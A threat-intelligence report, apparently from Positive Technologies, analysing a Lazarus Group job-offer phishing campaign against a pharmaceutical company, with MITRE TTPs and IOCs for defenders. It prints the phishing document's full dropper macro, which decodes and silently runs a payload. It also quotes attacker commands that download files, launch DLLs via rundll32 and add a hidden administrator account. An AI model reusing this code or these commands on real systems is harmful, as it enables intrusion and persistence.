{
	"id": "3caa9aed-43ce-4c37-8793-a99301c11e54",
	"created_at": "2026-04-06T00:11:04.695857Z",
	"updated_at": "2026-04-10T03:38:20.296386Z",
	"deleted_at": null,
	"sha1_hash": "2af2d8cb54bdb9d6befda3b634d5c15da281d6c5",
	"title": "Lazarus Group Recruitment: Threat Hunters vs Head Hunters",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4195667,
	"plain_text": "Lazarus Group Recruitment: Threat Hunters vs Head Hunters\r\nBy Positive Technologies\r\nPublished: 2024-08-19 · Archived: 2026-04-05 19:05:37 UTC\r\nContents\r\nIntroduction\r\n1. Sequence of events\r\n2. Malicious document\r\n3. Trojan-Downloader Agamemnon\r\n4. Trojan-Backdoor CommsCacher\r\n5. Logs of victims\r\n6. Attribution\r\n7. Conclusions\r\n8. Similar malicious campaign\r\n9. Verdicts of our products\r\n10. MITRE TTPs\r\n11. IOCs\r\nIntroduction\r\nAt the end of September 2020, Positive Technologies Expert Security Center (PT Expert Security Center, PT ESC) was\r\ninvolved in the investigation of an incident in one of the largest pharmaceutical companies. After starting to analyze the\r\ntactics, techniques, and procedures (TTPs) of the attackers, the investigation team found similarities with the Lazarus Group\r\nattacks previously described in detail by cybersecurity experts in the reports Operation: Dream Job and \"Operation (노스 스타) North Star A Job Offer That's Too Good to be True?\".\r\nThis article describes a previously unknown attack by the APT group, reveals the Lazarus Group's TTPs that allowed\r\nattackers to obtain partial control over a pharmaceutical company's infrastructure in just four days, as well as the tools used\r\nby the attackers for preliminary compromise, network reconnaissance, and gaining persistence in the infrastructure of the\r\ntargeted company.\r\nAt the end of the article, PT ESC provides a list of the group's TTPs and indicators of compromise that can be used by\r\ncybersecurity specialists to identify traces of the group's attacks and search for threats in their infrastructure.\r\n1. Sequence of events\r\nAt the end of September 2020, an employee of the pharmaceutical company received a document named\r\nGD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00). 
After a short period of time, another\r\nemployee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date:\r\n2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on\r\ntheir home computers (see the «Malicious document» section).\r\nFigure 1. Malicious document\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 1 of 20\n\nIn one of the cases, a malicious document was received via Telegram. Note that both documents were received by the\r\nvictims over the weekend.\r\nAfter running malicious macros on two compromised computers, reconnaissance was performed (T1016: System Network\r\nConfiguration Discovery) by using system utilities ipconfig.exe, ping.exe, and net.exe. Also the following unknown PE files\r\nwere launched:\r\nC:\\ProgramData\\Applications\\ZCacher.dat ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor.tls-lbn ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor.tls ;\r\nC:\\ProgramData\\Applications\\MemoryCompressor64.exe .\r\nIt was not possible to gain full access to all the files listed above during the incident investigation.\r\nOne of the compromised computers used CommsCacher, a backdoor named ApplicationCacher-f0182c1a4.rb (compilation\r\ndate: 2020-09-14T16:21:41Z), and its configuration file C:\\Users\\*\\AppData\\Local\\.IdentityService\\AccountStore.bak\r\nencrypted with the VEST algorithm, as well as the LNK startup file C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\MSSqlite3Svc.lnk. Notably, the backdoor monitors RDP sessions on the compromised computer\r\nusing WTSEnumerateSessionsW (see the Trojan-Backdoor CommsCacher section).\r\nAccording to the proxy server logs, the compromised computers tried to connect to the address forecareer[.]com:443,\r\nwhich was not detected by antivirus engines as malicious at the time of the attack. 
According to WHOIS entries, the domain\r\nhad been registered a few days before the attack began.\r\nFigure 2. Domain data from the VirusTotal resource\r\nFigure 3. Domain registrar data\r\nAt the time of the attack, content was published on the domain that copied a page of the official website of General\r\nDynamics Mission Systems, one of the world's largest manufacturers of military and aerospace equipment. The Lazarus\r\nGroup had already used this brand in its attacks. The domain also had a valid SSL certificate.\r\nFigure 4. SSL certificate parameters\r\nFigure 5. Original page of the General Dynamics Mission Systems website\r\nFigure 6. Forged page\r\nAt the beginning of the working week, both victims connected to the RDG server of one of the organization's branches from\r\nthe compromised personal computers. This allowed attackers to gain access to the company's corporate network.\r\nOn the same day, the company's RDG server showed traces of illegitimate activity and evidence of malicious reconnaissance\r\non the network for the first time. 
The compromised accounts, in particular, were used to run system utilities systeminfo.exe,\r\nipconfig.exe, netstat.exe, tasklist.exe, qwinsta.exe, query.exe, quser.exe, net.exe, and ping.exe, as well as\r\nC:\\ProgramData\\Comms\\Cacher.hls-iol (a version of the public utility ADFind for Active Directory queries).\r\nLater, CommsCacher with the name C:\\ProgramData\\USOShared\\usomsqlite3.lgs.dat was also installed on the RDG server.\r\nThe attackers also uploaded an unknown PE file with the name C:\\ProgramData\\volitile.dat and launched the DLL library\r\nC:\\ProgramData\\comms\\commspkg.bin (compilation date: 2020-08-22T18:45:25Z), which uses CreateProcessW to execute the files\r\npassed to it in its command-line configuration. The library is protected by VMProtect.\r\n \r\npowershell -Command (New-Object Net.WebClient).DownloadFile('http://192.168.129.92:8080/volitile.ico', 'C:\\Pro\r\n \r\ncmd.exe /c cmd.exe /c rundll32.exe c:\\\\programdata\\\\comms\\\\commspkg.bin,Serialize +JHzz8nMxMn+wvv+y/7z+MzCwsjz+MzCwsjPwMS\r\nTwo days after entering the corporate network, the attackers gained access to a number of servers, including the\r\ndomain controller, an additional RDG server, a file server, and a Crontab server. On these servers, the attackers also performed\r\nreconnaissance using system utilities and created system services named usomgmt; the attackers used this name for\r\ntheir own services on the compromised hosts:\r\ncmd.exe /c cmd.exe /c C:\\ProgramData\\Microsoft\\gpolicy.dat -f C:\\ProgramData\\Microsoft\\gpolicy.out C:\\ProgramData\\Microso\r\ncmd.exe /c cmd.exe /c C:\\ProgramData\\Microsoft\\gpolicy.dat 312 C:\\ProgramData\\Microsoft\\gpolicy.bat\r\ncmd.exe /c cmd.exe /c net user admin$ abcd1234!@#$ /add\r\ncmd.exe /c cmd.exe /c net localgroup administrators admin$ /add\r\ncmd.exe /c cmd.exe /c net localgroup Администраторы 
admin$ /add\r\ncmd.exe /c cmd.exe /c net user admin$ /delete \u003e\u003e C:\\ProgramData\\Microsoft\\gpolicy.out\r\nDuring incident investigation, the experts failed to gain access to files C:\\ProgramData\\Microsoft\\gpolicy.dat,\r\nC:\\ProgramData\\Microsoft\\gpolicy.out, C:\\ProgramData\\Microsoft\\gpolicy.bin, and C:\\ProgramData\\Microsoft\\gpolicy.bat.\r\nThe creation and deletion of the user admin$ and its addition to the administrators group would later arouse the\r\nsuspicion of the system administrators of the compromised company and mark the beginning of the incident response.\r\nSimilar actions of attackers with the account admin$ were described in the report \"Greetings from Lazarus.\"\r\nAt the same time, by performing reconnaissance on the computers available, the attackers identified new vectors for\r\npenetration into the company's corporate network. Two days after the company's network infrastructure was\r\ncompromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was\r\ncontacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics\r\nUK.\r\nFigure 7. Example of correspondence with Rob Wilson on LinkedIn\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Message \"***, please add me to your LinkedIn network!\" — Ro\r\nhttps://mail.yandex.ru/?uid==*********#message/***************,Message «Rob sent you a new message» — Rob Wilson via Link\r\nFigure 8. 
Rob Wilson account\r\nAfter studying the information about the job and the company through the Yandex search engine, Wikipedia and the\r\nlegitimate website of General Dynamics UK, the employee continued to correspond with Rob Wilson's account, from whom\r\nthey received links to download malicious documents GD20200909GAB31.doc, PDF20200920KLKA.pdf, and\r\nPDF20200920KLKA.zip from an attacker-controlled job search website clicktocareers[.]com, which was not detected by\r\nantivirus engines as malicious at the time of the attack.\r\nFigure 8. Domain data from the VirusTotal resource\r\nNote that the victim failed to open the received PDF document the first time, after which the attackers sent her the\r\nInternalPDFViewer.exe software to view PDF files.\r\nhttps://generaldynamics.uk.com/,Home - General Dynamics UK,29.09.2020 13:43,2,https://yandex.ru/search/?lr=16\u0026text=%20Gen\r\nhttps://generaldynamics.uk.com/about/about-us/,About us - General Dynamics UK,29.09.2020 13:44\r\nhttps://generaldynamics.uk.com/work/,Work with us - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/,Careers - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/project-management/,Project management - General Dynamics UK,29.09.2020 13:45\r\nhttps://generaldynamics.uk.com/work/careers/current-vacancies/,Current vacancies - General Dynamics UK,29.09.2020 13:46\r\nThe compromised user also forwarded the malicious email to her colleague. 
However, the recipient did not open the\r\nmalicious document, so the attackers could not expand the attack surface.\r\n \r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=10931 GD20200909GAB31.doc 29.09.2020\r\nhttps://ru.wikipedia.org/wiki/General_Dynamics,General Dynamics — Википедия,29.09.2020 13:56,1,https://yande\r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=12314 PDF20200920KLKA.ZIP 29.09.2020\r\nhttps://mail.clicktocareers[.]com/public/jobapplications/jdviewer.php?jd=77234 PDF20200920KLKA.PDF 29.09.2020\r\nhttps://generaldynamics.uk.com/systems/,See what we do - General Dynamics UK,29.09.2020 14:11\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Rob sent you a new message» — Rob Wilso\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Job Proposal at GDLS» — Rob Wilson — Я\r\nhttps://mail.yandex.ru/?uid=*********#message/***************,Письмо «Re: Job Proposal at GDLS» — Rob Wilson\r\n \r\nSensitive information has been replaced with asterisks (*).\r\nOn the compromised computer, the attackers performed reconnaissance using the system commands query.exe, quser.exe, and\r\nnetstat.exe and installed a CommsCacher backdoor named CommsCacher.dat, which gains persistence via an LNK file in\r\nthe startup folder. The experts also found evidence that the malicious DLL Trojan-Downloader\r\nAgamemnon regid.mdb (compilation date: 2020-09-14T16:21:26Z) had been launched; it is extracted from the malicious document, then\r\ncollects information from the infected host, sends it to the attackers' server, and in response receives a payload (see the\r\nTrojan-Downloader Agamemnon section). Command execution and network reconnaissance on the computer were carried\r\nout using the public utility SMBMAP, designed for scanning SMB services.\r\n2. Malicious document\r\nThe phishing document GD2020090939393903.doc contains decoy text in the form of a job offer. 
The text of the\r\ndocument:\r\nSenior Business Manager\r\nJob Location: Washington, DC\r\nEmployment Type: Full Time\r\nClearance Level Must Currently Possess: None\r\nClearance Level Must Be Able to Obtain: None\r\nTelecommuting Options: Some Telecommuting Allowed\r\nAnnual Salary: $72k - $120k\r\nJob Description:\r\nGeneral Dynamics Mission Systems (GDMS) engineers a diverse portfolio of high technology solutions, products and services\r\nWith a global team of 13,000+ top professionals, we partner with the best in industry to expand the bounds of innovation i\r\nGiven the nature of our work and who we are, we value trust, honesty, alignment and transparency. We offer highly competit\r\nYou will also enjoy a flexible work environment where contributions are recognized and rewarded. If who we are and what we\r\nResponsibilities:\r\nBachelor's degree in Senior Business Manager or a related specialized area or the equivalent experience is required plus a\r\nThe candidate must have proven experience with the capture management and proposal development processes.\r\nDepartment of Defense TS/SCI security clearance is preferred at time of hire. Candidates must be able to obtain a TS/SCI c\r\nDue to the nature of work performed within our facilities, U.S. 
citizenship is required.\r\nFor foreign Candidates, they have to related in U.S with family.\r\nQualifications:\r\nAt General Dynamics Mission Systems (GDMS), we deliver systems that provide critical intelligence data to our national lea\r\nAs market leader and technology innovator, we are seeking talented professionals to deliver cutting edge solutions to our\r\nGDMS has an immediate opening for a Senior Manager of Business Development.\r\nThe selected candidate will work to identify and acquire new business ventures for GDMS and its customers.\r\nThe Senior Manager of Business Development will work among a talented and technically accomplished group of colleagues, an\r\nREPRESENTATIVE DUTIES AND TASKS:\r\nThe selected Senior Manager of Business Development:\r\nIdentifies and captures new business opportunities in the international and domestic Signals Intelligence (SIGINT) marketp\r\nEstablishes and maintains frequent Intelligence Community (IC) and Defense customer contacts in the international and dome\r\nCollaborates with customers to develop system Concept of Operations (CONOPS), architectures, and requirements for SIGINT,\r\nDevelops and presents briefing packages of business area capabilities and system offerings to international and domestic c\r\nWorks closely with business area technical and management team to align business area strategy, capabilities, investments,\r\nPerforms competitor analyses and develops teaming relationships as needed;\r\nWorks closely with Export Compliance organization to obtain all export licenses for business pursuits in the international\r\nRequired Skills:\r\nMinimum of five (5) years of project management related experience, with 2 years of experience as a Business Development M\r\nExperience coordinating and overseeing the implementation of security projects.\r\nExperience with MS Project, SharePoint, or other project management tools.\r\nKnowledge of general management and auditing techniques for identifying problems, 
gathering and analyzing pertinent inform\r\nExcellent oral and written communication skills. Interaction and information gathering with coworkers and customers.\r\nEducation / Certifications:\r\nMaster's degree from an accredited higher education institution and a minimum of 11 years of progressive Business Developm\r\nOne industry-recognized business development management certification.\r\nCertifications relating to Government Clearance (a plus)\r\nWe are GDMS. The people supporting some of the most complex government, defense, and intelligence projects across the coun\r\n \r\nSome variants of the malicious documents obtained during the investigation were protected with the password JD-20BZ@9918261231C3 (presumably to evade security tools). Document metadata:\r\nFile Size : 1991 kB\r\nFile Permissions : rwxrwx---\r\nFile Type : DOC\r\nFile Type Extension : doc\r\nMIME Type : application/msword\r\nTitle :\r\nSubject :\r\nAuthor : User\r\nKeywords :\r\nComments :\r\nTemplate : Normal\r\nLast Modified By : Admin\r\nRevision Number : 2\r\nSoftware : Microsoft Office Word\r\nTotal Edit Time : 2.0 minutes\r\nCreate Date : 2020:09:22 03:08:00\r\nModify Date : 2020:09:22 03:08:00\r\nPages : 4\r\nWords : 870\r\nCharacters : 4960\r\nSecurity : Password protected\r\nCode Page : Windows Latin 1 (Western European)\r\nCompany :\r\nLines : 41\r\nParagraphs : 11\r\nChar Count With Spaces : 5819\r\nApp Version : 15.0000\r\nScale Crop : No\r\nLinks Up To Date : No\r\nShared Doc : No\r\nHyperlinks Changed : No\r\nTitle Of Parts :\r\nHeading Pairs : Title, 1\r\nComp Obj User Type Len : 32\r\nComp Obj User Type : Microsoft Word 97-2003 Document\r\nAnalysis of the document showed that GD2020090939393903.doc contains a malicious VBA macro and a payload encoded\r\nusing Base64 and XOR algorithms:\r\nFigure 10. 
The structure of the document GD2020090939393903.doc\r\nAttribute VB_Name = \"NewMacros\"\r\n' Decodes a Base64 string into a byte array using the MSXML DOM\r\nPrivate Function Base64Decode(base64 As String) As Variant\r\n Dim xmlDoc As Object\r\n Dim xmlNode As Object\r\n Set xmlDoc = CreateObject(\"MSXML2.DOMDocument\")\r\n Set xmlNode = xmlDoc.createElement(\"b64\")\r\n xmlNode.dataType = \"bin.base64\"\r\n xmlNode.Text = base64\r\n Base64Decode = xmlNode.nodeTypedValue\r\nEnd Function\r\n' Decodes an obfuscated string: Base64, then for each byte XOR 37 and subtract 122\r\nPrivate Function GetStringData(data As String) As String\r\n Dim decData As Variant\r\n Dim nLen As Long\r\n Dim strPath As String\r\n decData = Base64Decode(data)\r\n nLen = UBound(decData) - LBound(decData) + 1\r\n strPath = \"\"\r\n For inx = 0 To nLen - 1\r\n strPath = strPath \u0026 Chr((decData(inx) Xor 37) + 134 - 256)\r\n Next inx\r\n GetStringData = strPath\r\nEnd Function\r\n' Decodes the embedded payload: Base64, then for each byte XOR 214 and add 55 (mod 256)\r\nPrivate Function GetBufferData(data As String) As Variant\r\n Dim decData As Variant\r\n Dim nLen As Long\r\n decData = Base64Decode(data)\r\n nLen = UBound(decData) - LBound(decData) + 1\r\n For inx = 0 To nLen - 1\r\n If ((decData(inx) Xor 214) + 55) \u003e 255 Then\r\n decData(inx) = (decData(inx) Xor 214) + 55 - 256\r\n Else\r\n decData(inx) = (decData(inx) Xor 214) + 55\r\n End If\r\n Next inx\r\n GetBufferData = decData\r\nEnd Function\r\nSub AutoOpen()\r\n'\r\n' AutoOpen Macro\r\n'\r\n'\r\nDim strPath As String\r\nDim strArgment As String\r\nDim DataBuffer As Variant\r\nDim PBuffer() As Byte\r\nDim strObject As String\r\nIf ActiveDocument.Shapes.Count \u003c 1 Then Exit Sub\r\n' Drop path, run command, payload bytes and COM object name are stored obfuscated in Text Box shapes of the document\r\nstrPath = GetStringData(ActiveDocument.Shapes(\"Text Box 3\").TextFrame.TextRange.Text)\r\nstrArgment = GetStringData(ActiveDocument.Shapes(\"Text Box 4\").TextFrame.TextRange.Text)\r\nDataBuffer = GetBufferData(ActiveDocument.Shapes(\"Text Box 5\").TextFrame.TextRange.Text)\r\nnLen = UBound(DataBuffer) - LBound(DataBuffer) + 1\r\nstrObject = 
GetStringData(ActiveDocument.Shapes(\"Text Box 6\").TextFrame.TextRange.Text)\r\n ' Write the decoded payload bytes to the drop path\r\n ReDim PBuffer(nLen)\r\n For inx = 0 To nLen - 1\r\n PBuffer(inx) = DataBuffer(inx)\r\n Next inx\r\n Open strPath For Binary Lock Write As #1\r\n Put #1, 1, PBuffer\r\n Close #1\r\n ' Replace the visible document content with the text stored in Text Box 2 and save the document\r\n ActiveDocument.Shapes(\"Text Box 2\").Select\r\n Selection.ShapeRange.TextFrame.TextRange.Select\r\n Selection.Collapse\r\n Selection.WholeStory\r\n Selection.Copy\r\n Selection.ShapeRange.Select\r\n Selection.MoveUp Unit:=wdScreen, Count:=1\r\n Selection.WholeStory\r\n Selection.Delete Unit:=wdCharacter, Count:=1\r\n Selection.PasteAndFormat (wdFormatOriginalFormatting)\r\n ActiveDocument.Save\r\n ' Instantiate the COM object named in Text Box 6 and run the decoded command with a hidden window\r\n Set objShell = CreateObject(strObject)\r\n objShell.Run strArgment, 0, False\r\n Set objShell = Nothing\r\nEnd Sub\r\nLater, during threat hunting, the experts found similar documents:\r\nName SHA-256\r\nGDLS202009069871.pdf e13888eed2466efaae729f16fc8e348fbabea8d7acd6db4e062f6c0930128f8f\r\nGDLS_2020090392828334.doc 9c906c2f3bfb24883a8784a92515e6337e1767314816d5d9738f9ec182beaf44\r\nGDLS202009069871.doc 75bf8feeac2b5b1690feab45155a6b97419d6d1b0d36083daccb061dc5dbdea8\r\nExamples of decoy documents:\r\nFigure 11. Example of a stub\r\nFigure 12. Example of a stub\r\n3. Trojan-Downloader Agamemnon\r\nIf successful, the malicious macro writes the decrypted payload (MD5: 963e8cfaa40226ba2e5d516464572446) to the file\r\nC:\\ProgramData\\regid.mdb and runs the library with the following parameters:\r\n \r\nrundll32.exe C:\\ProgramData\\regid.mdb,sqlite3_create_functionex X4BJOPK3O6nxwkVuK3HqqTt4 LRTB /QV3AcjAeAb/x3xH\r\nAgamemnon is a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex. 
This\r\nmodification, as well as the method of gaining persistence on a compromised computer via the startup folder, was described\r\nin the report Operation (노스 스타) North Star A Job Offer That's Too Good to be True.\r\nWhen launched, the extracted file regid.mdb collects the following information about the system:\r\nComputer name;\r\nInformation about network adapters;\r\nUser name;\r\nList of running processes.\r\nNext, the malware compresses the collected data using the LZ algorithm with the maximum compression ratio, after which it\r\nencrypts the data with its own algorithm and encodes it in Base64. The malware also generates a unique identifier for the\r\ninfected host.\r\nThe collected information is sent to one of the attackers' C2 servers along with the computer ID. The full list of C2 servers is\r\npassed in encrypted form via the command line. The file GD2020090939393903.doc passes the following list of C2\r\nservers:\r\nhttps://propro[.]jp/wp-content/documents/docsmgmt.php\r\nhttp://www.ctevt.org[.]np/ctevt/public/frontend/review.php\r\nhttp://gbflatinamerica[.]com/file/filelist.php\r\nhttp://www.apars-surgery[.]org/bbs/bbs_files/board_blog/write.php\r\nhttp://goldllama4.sakura.ne[.]jp/waterdo/wp/wp-content/plugins/view.php\r\nhttps://bootcamp-coders.cnm[.]edu/~dmcdonald21/emoji-review/storage/app/humor.php\r\nAfter sending the data to the C2 server, the malware receives a response from it, which contains the main payload, also encrypted\r\nwith the same custom algorithm. The payload is either executed in the process memory or written to disk at\r\n%localappdata%\\~DMF[0-9]{4}.tmp (the path is given in RegExp format) and launched using rundll32.exe. Which execution\r\nmode is used is determined by the C2 server's response.\r\nNote that the loader is successfully detected in the public sandbox ANY.RUN.\r\nFigure 13. Information about network detection\r\n4. 
Trojan-Backdoor CommsCacher\r\nCommsCacher is also a legitimate SQLite DLL library with the malicious exported function sqlite3_create_functionex.\r\nExamples of LNK files with CommsCacher autorun parameters are shown below.\r\nrundll32.exe CommsCacher.dat,sqlite3_create_functionex dbmanagementservice19253\r\nrundll32.exe ApplicationCacher-f0182c1a4.rbs,sqlite3_create_functionex sqlite3msdbmgmtsvc-f810a\r\nCommsCacher reads and writes its configuration data on disk in the file\r\n%localappdata%\\.IdentityService\\AccountStore.bak. The configuration file is encrypted with the VEST encryption\r\nalgorithm and contains a list of C2 servers. Example of the configuration data:\r\nhttps://akramportal[.]org/delv/public/voice/voice.php\r\nhttps://vega.mh-tec[.]jp/.well-known/gallery/siteview.php\r\nhttps://www.hospitality-partners[.]co.jp/works/performance/consumer.php\r\nhttps://inovecommerce[.]com.br/public/pdf/view.php\r\nConnecting to one of the C2 servers, the sample receives shellcode and configuration data in response from the C2. The\r\nreceived data is decrypted and the shellcode is launched with the transmitted parameters. After that, the CommsCacher\r\nmalware opens a named pipe \\\\.\\pipe\\fb4d1181bb09b484d058768598b, which is used to receive data from the shellcode\r\nand then transmit it to the C2 server.\r\nThe detected samples C:\\ProgramData\\Applications\\ApplicationCacher-f0182c1a4.rbs (compilation date: 2020-09-24T05:12:24Z) and C:\\ProgramData\\USOShared\\usomsqlite3.lgs.dat (compilation date: 2020-09-29T03:34:06Z) are similar\r\nto CommsCacher. The files are padded with 64 MB of random repeating characters, which the attackers could use to bypass\r\nantivirus protection that ignores large files.\r\nThe backdoor functions and its server side were described in detail in the article Operation North Star: Behind The Scenes.\r\n
Logs of victims\r\nDuring the incident investigation, a number of malicious C2 servers were identified, and, after studying them, the experts\r\nmanaged to obtain log files with the IP addresses of victims also compromised by this group. Log format: [JD = ID][Date]\r\n[Victim IP] [User-Agent].\r\nAll identified victims were notified of the incidents. Sensitive information has been replaced with asterisks (*).\r\nFigure 14. Structure of open folders\r\nFigure 15. Example of lines from a victim log\r\nThe attacker-controlled servers contained files named sclient+[md5 victim]+.tmp or pagefile+[md5 victim]+.dat. These files\r\ncontained information from compromised computers.\r\n6. Attribution\r\nThe detected indicators of compromise belong to Lazarus Group, a hacker group also known as Hidden Cobra. The group\r\nhas been active since at least 2009. Lazarus is believed to be a state-sponsored APT group operating from North Korea.\r\nThe group regularly conducts its attacks for the purpose of cyberespionage.\r\nThe main initial access vector is targeted phishing through third-party resources (Phishing: Spearphishing via Service).\r\nIn this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with\r\nmalicious macros containing a stub text with a job offer through LinkedIn, Telegram, WhatsApp, and corporate email.\r\nBelow is an example of correspondence between one of the victims and an attacker in the Telegram messenger. In this case,\r\nthe attacker offered the victim a test assignment hosted on the attacker-controlled server.\r\nFigure 16. Example of correspondence with the attacker\r\nTo attack the organization, the attackers created a phishing site impersonating General Dynamics Mission Systems. 
As C2 servers, they\r\nused the resources of allegedly compromised organizations located in Brazil, France, Japan, South Korea, and the United\r\nStates.\r\nFigure 17. Original and fake version of the GDMS website\r\nThe group is characterized by the use of unique malicious software for remote command execution:\r\nThe detected backdoor CommsCacher indicates a connection with the malicious campaign Dream Job and identifies\r\nthe group of attackers as the Lazarus Group.\r\nThe document GD2020090939393903.doc obtained during the investigation contains a malicious macro, an\r\nencrypted payload, and startup parameters that are stored in Text Box shapes, which matches the description of\r\nmalicious documents in the McAfee report.\r\nThe malicious campaign was also reported by researchers from IssueMakersLab:\r\nFigure 18. Chronology of attacks\r\n7. Conclusions\r\nTo identify all compromised hosts and obtain detailed information about the incident, the experts scanned the entire\r\ncompany's infrastructure for indicators of compromise, as well as network and file signatures of users. All possible host\r\nartifacts were also analyzed. The most useful artifacts for restoring the incident chronology were the USN Journal, EVTX\r\nEvents, Jump Lists, and the MFT table.\r\nThis article describes the TTPs of the Lazarus Group, which allowed them to gain partial control over the infrastructure of\r\nthe compromised company within four days. This shows that the attackers were well prepared and took an individual\r\napproach to compromising each host in the infrastructure. The attackers used both publicly available software and tools of\r\ntheir own design.\r\nAccording to the investigation, the attackers did not gain access to sensitive information. 
As a result of the prompt actions of\r\nPT ESC specialists and administrators of the pharmaceutical company, the attackers lost access to the\r\ninfrastructure they had controlled.\r\nAuthor: Aleksandr Grigorian, Positive Technologies\r\nThe article's author thanks the incident response and threat intelligence teams of PT Expert Security Center for their help in\r\ndrafting the story.\r\n8. Similar malicious campaign\r\nAfter investigating the incident, we continued to track the Lazarus Group and identified a new attack that has no direct\r\nconnection to the case in question, but affects a similar geographical segment.\r\nDuring this attack, in November 2020, attackers used a malicious document (GDLS47129481.docx,\r\nMD5 994c02f8c721254a959ed9bc823ab94b) exploiting CVE-2017-0199. The attack was allegedly aimed at a company from Russia.\r\nThe attack was also reported on the Anonymous Security Agency's Twitter account.\r\nThe document contained the following stub:\r\nFigure 19. Example of the phishing document\r\nC2 server:\r\nhttps://www.forecareer[.]com/gdcareer/officetemplate-20nab.asp?iqxml=480012756ad26f72e412db0ae7aa183e\r\nThe attackers used the domain from the previous campaign; however, the appearance of the phishing site was\r\nchanged.\r\nFigure 20. Forged page\r\n9. Verdicts of our products\r\nPT Sandbox\r\nBackdoor.Win32.Regid.a\r\nBackdoor.Win64.CommsCacher.a\r\nTrojan.Win32.Generic.a\r\nPT Network Attack Discovery\r\nLOADER [PTsecurity] Agamemnon\r\nsid: 10006234;10006237;10006238;\r\n10. 
MITRE TTPs\r\nID | Name | Description\r\nInitial Access\r\nT1566.003 | Phishing: Spearphishing via Service | The Lazarus Group uses malicious job ads sent via LinkedIn\r\nExecution\r\nT1047 | Windows Management Instrumentation | The Lazarus Group uses wmic.exe to run commands\r\nT1106 | Native API | The Lazarus Group uses CreateProcessW to run malware and WTSEnumerateSessionsW to monitor RDP sessions\r\nT1059.003 | Command and Scripting Interpreter: Windows Command Shell | The Lazarus Group uses the Windows command line to run commands\r\nPersistence\r\nT1543.003 | Create or Modify System Process: Windows Service | To gain persistence on a host, the Lazarus Group creates services using the sc.exe utility\r\nT1136 | Create Account | The Lazarus Group creates local administrator accounts\r\nT1547.009 | Boot or Logon Autostart Execution: Shortcut Modification | To gain persistence on a host, the Lazarus Group places a shortcut in the startup folder\r\nDefense Evasion\r\nT1027 | Obfuscated Files or Information | The configuration file AccountStore.bak is encrypted with the VEST algorithm\r\nT1564.001 | Hide Artifacts: Hidden Files and Directories | The Lazarus Group stores its malware in hidden folders at C:\\ProgramData\r\nT1070.004 | Indicator Removal on Host: File Deletion | The Lazarus Group removes malware samples from the file system\r\nT1218.011 | Signed Binary Proxy Execution: Rundll32 | A malicious DLL is launched via rundll32.exe with an indication of the exported function and with startup parameters\r\nDiscovery\r\nT1087.001 | Account Discovery: Local Account | The Lazarus Group collects information about users using the net user and net group commands\r\nT1069.002 | Permission Groups Discovery: Domain Groups | The Lazarus Group uses the adfind utility to retrieve information from Active Directory\r\nT1016 | System Network Configuration Discovery | The Lazarus Group collects information about the network settings of the infected computer\r\nT1135 | Network Share Discovery | The Lazarus Group uses the SMBMap utility to discover shared folders within the network\r\nT1012 | Query Registry | The Lazarus Group uses the reg.exe utility to get information from the registry\r\nT1033 | System Owner/User Discovery | The Lazarus Group collects information about users of a compromised computer\r\nT1057 | Process Discovery | The Lazarus Group uses the tasklist.exe utility to get information about processes\r\nT1082 | System Information Discovery | The Lazarus Group uses the systeminfo.exe utility to get information about the system\r\nLateral Movement\r\nT1021.002 | Remote Services: SMB/Windows Admin Shares | The Lazarus Group uses compromised legitimate privileged accounts to move laterally on the network\r\nCommand And Control\r\nT1132.002 | Data Encoding: Non-Standard Encoding | The Lazarus Group uses its own data encryption algorithm to communicate with the C2\r\nT1071.001 | Application Layer Protocol: Web Protocols | The Lazarus Group's malware uses the standard HTTP protocol to connect to the C2\r\n11. 
IOCs\r\nFile name MD5 SHA-1 SHA-256\r\nAccountStore.bak 665ce00318552c6ddc22e2f5e59cd516 71e5bb0e7f00bb11518e8d7f619f2b6c9fa09eaf 7e454b22987d8901a\r\nAccountStore.bak 107953faf48823913b19ab7cf311a2c8 73a2aed35aa5fc8621828e11c76d58144ea7f6bb ceec993673d95fd0af\r\nAccountStore.bak bc1e06ba5f472aaf30d8027dc8562307  04bc9e74c65b6df6f6c4ba90db3d85ca9b2dda4c 79076febac7abad26a\r\nAccountStore.bak 66037fc3c489d099107e2d3cddd33569 a7e34ed64337893752eadfbfae9a516c8b482329 c1d6a5940045b7ff00\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/lazarus-recruitment/\r\nPage 19 of 20\n\nFile name MD5 SHA-1 SHA-256\r\nApplicationCacher-f0182c1a4.rbs\r\n5f77737c1f4bd8b1868dc50efce1bbf5 c85c825f1e2ef66d83dc1cf011f8b2e6aee08fa8 93d78712eb3f9e812\r\nCacher.hls-iol 12011c44955fd6631113f68a99447515 4f4f8cf0f9b47d0ad95d159201fe7e72fbc8448d c92c158d7c37fea795\r\nCommsCacher.bin 74c71671764610245a392f7e7444694c d28318b4ab7a9076eed8f20306ddf68731ed2357 7e37d83efd01785ace\r\nCommsCacher.dat 8ec9ff02b58559c851b59189a9d57124 9952c3fa4bce7ef68f8f6a50a593c8ead2481488 56f5252ea7b10a8a2e\r\nCommsCacher.dat 3af010659d19b69d8fbc9b9bb917f603 4b404db4dbdf9240926fc9f3225e4cdd3a9f443c d6b7cdd046f0c185e9\r\nCommsMangement.tls - - 02546fae0355905d3\r\ncommspkg.bin a63d7e501a17c8917ef96d4b31fa100b  6e8728af6cc4a7daa06e4ced52a8f45ec6229fd8  